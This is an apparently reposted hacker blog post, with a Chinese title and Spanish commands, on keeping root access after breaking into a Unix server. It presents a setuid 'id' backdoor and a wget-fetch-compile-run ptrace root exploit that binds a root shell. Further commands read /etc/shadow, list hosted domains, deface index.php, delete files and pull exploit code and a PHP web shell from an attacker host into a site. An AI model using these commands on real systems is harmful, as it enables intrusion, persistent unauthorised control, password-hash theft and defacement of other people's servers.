总结UNIX成为root以后保持权限的方法

来源:古典辣妹 's blog

by:cnbird

1.

[cnbird@localhost tmp]#id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)

[cnbird@localhost tmp]#cp `which id ` .

[cnbird@localhost tmp]#chown root ./id

[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id

[cnbird@localhost tmp]#ls -l ./id

-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*

[cnbird@localhost tmp]#exit

[cnbird@localhost tmp]$id

uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)

[cnbird@localhost tmp]$./id

uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)

2.利用ptrace成为root的方法

[bash]# cd /tmp/; wget http://delivered.informaticahispana.org/ptrace.c; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace
-> Parent's PID is 2313. Child's PID is 2314.
-> Attaching to 2315...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x4000e85d
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....

[bash]# id
uid=0(root) gid=0(root) groups=0(root)

Para ver los dominios que hay en el server:
---------------------------------------------------------
cat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominios
cat /etc/httpd/conf/httpd.conf << Unicamente los puros dominios
cat /etc/localdomains << Unicamente los dominios locales
cat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio
cat /etc/userdomains << Este es el mas comun
---------------------------------------------------------

Para ver la version de kernel:
---------------------------------------------------------
uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.
---------------------------------------------------------

Para modificar un index ya existente:
---------------------------------------------------------
echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido
---------------------------------------------------------

Para subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
---------------------------------------------------------
cd /tmp/;wget http://web_atacante/exploit.c <<aqui subimos el exploit
cd /tmp/;cc exploit.c -o exploit_compilado <<aqui lo compilamos con el nombre de "exploit_compilado"
cd /tmp/;chmod -c 777 exploit_compilado <<aqui le damos permisos de ejecucion a "exploit_compilado"
cd /tmp/;./exploit_compilado <<aqui estamos ejecutando a "exploit_compilado".
Hasta aqui termina el proceso para un exploit.
---------------------------------------------------------

Ver las contrase&ntilde;as encriptadas de todos los usuarios:
---------------------------------------------------------
cat /etc/shadow <<Solo funciona si tienes permisos como root.
---------------------------------------------------------

Borrar un Fichero:
---------------------------------------------------------
cd /home/juan/public_html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm
---------------------------------------------------------

Subir un fichero:
---------------------------------------------------------
cd /home/juan/public_html/;wget http://web_atacante/shell.php<<Estamos subiendo el fichero shell.php